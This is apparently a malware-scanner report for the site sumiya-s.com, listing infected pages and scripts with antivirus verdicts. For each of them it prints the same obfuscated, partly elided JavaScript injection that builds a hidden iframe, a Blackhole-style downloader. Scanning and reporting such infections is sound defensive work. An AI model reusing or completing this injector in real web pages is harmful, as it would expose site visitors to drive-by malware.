Malware Scanner report for sumiya-s.com

Malicious/Suspicious/Total urls checked: 11/0/13

11 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "sumiya-s.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sumiya-s.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://sumiya-s.com/	200 OK Content-Length: 8220 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/js/rollover.js	200 OK Content-Length: 5357 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_6b_77_7f_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_6b_77_7f_6c_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_ ... 3270 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/js/jquery-1.7.2.min.js	200 OK Content-Length: 99383 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_6b_77_7f_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_6b_77_7f_6c_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_ ... 3270 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/js/main_visual.js	200 OK Content-Length: 5169 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_6b_77_7f_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_6b_77_7f_6c_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_ ... 3270 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/index.html	200 OK Content-Length: 8220 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/recruit.html	200 OK Content-Length: 12736 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/work.html	200 OK Content-Length: 11643 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/contact.html	200 OK Content-Length: 10011 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/corporate.html	200 OK Content-Length: 10937 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://maps.google.com/maps/api/js?sensor=false	200 OK Content-Length: 3712 Content-Type: text/javascript	clean
http://sumiya-s.com/js/corporate_maps.js	200 OK Content-Length: 5272 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_79_6b_77_7f_6c_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_79_6b_77_7f_6c_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_ ... 3270 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/privacy.html	200 OK Content-Length: 11837 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}if(!a){try{--e("doc"+"ument")["\x62od"+z]}catch(q){a2="_";sa=0xa-02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_31_28_83_15_12_28_7e_69_7a_28_70_28_45_28_6c_77_6b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_30_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_70_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7f_7f_7f_36_7a_6b_7b_6d_6b_77_75_75_6d_7a_6b_6d_36_6b_77_75_37_7c_7a_69_6e_36_78_70_78_2f_43_15_12_28_70_36_7b_7c_ ... 3126 bytes are skipped ...12_71_6e_28_30_76_69_7e_71_6f_69_7c_77_7a_36_6b_77_77_73_71_6d_4d_76_69_6a_74_6d_6c_31_15_12_83_15_12_71_6e_30_4f_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_31_45_45_3d_3d_31_83_85_6d_74_7b_6d_83_5b_6d_7c_4b_77_77_73_71_6d_30_2f_7e_71_7b_71_7c_6d_6c_67_7d_79_2f_34_28_2f_3d_3d_2f_34_28_2f_39_2f_34_28_2f_37_2f_31_43_15_12_15_12_82_82_82_6e_6e_6e_30_31_43_15_12_85_15_12_85_15_12"[ps](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-sa);}zaz=za;e(zaz);} Antivirus reports: AntiVir JS/BlacoleRef.CZ.29 Avast JS:Decode-AQB [Trj] Emsisoft Trojan.JS.Agent.JBT (B) CAT-QuickHeal JS/Iframe.DEG DrWeb JS.IFrame.457 Kaspersky Trojan-Downloader.JS.Iframe.deg Fortinet JS/Iframe.DDG!tr.dldr NANO-Antivirus Trojan.Script.Expack.bvtkmp Norman Blacole.UC GData Trojan.JS.Agent.JBT BitDefender Trojan.JS.Agent.JBT
http://sumiya-s.com/test404page.js	404 Not Found Content-Length: 6410 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sumiya-s.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 22 Sep 2013 06:02:57 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 8220
Content-Type: text/html

...8220 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: sumiya-s.com
Referer: http://www.google.com/search?q=sumiya-s.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for sumiya-s.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools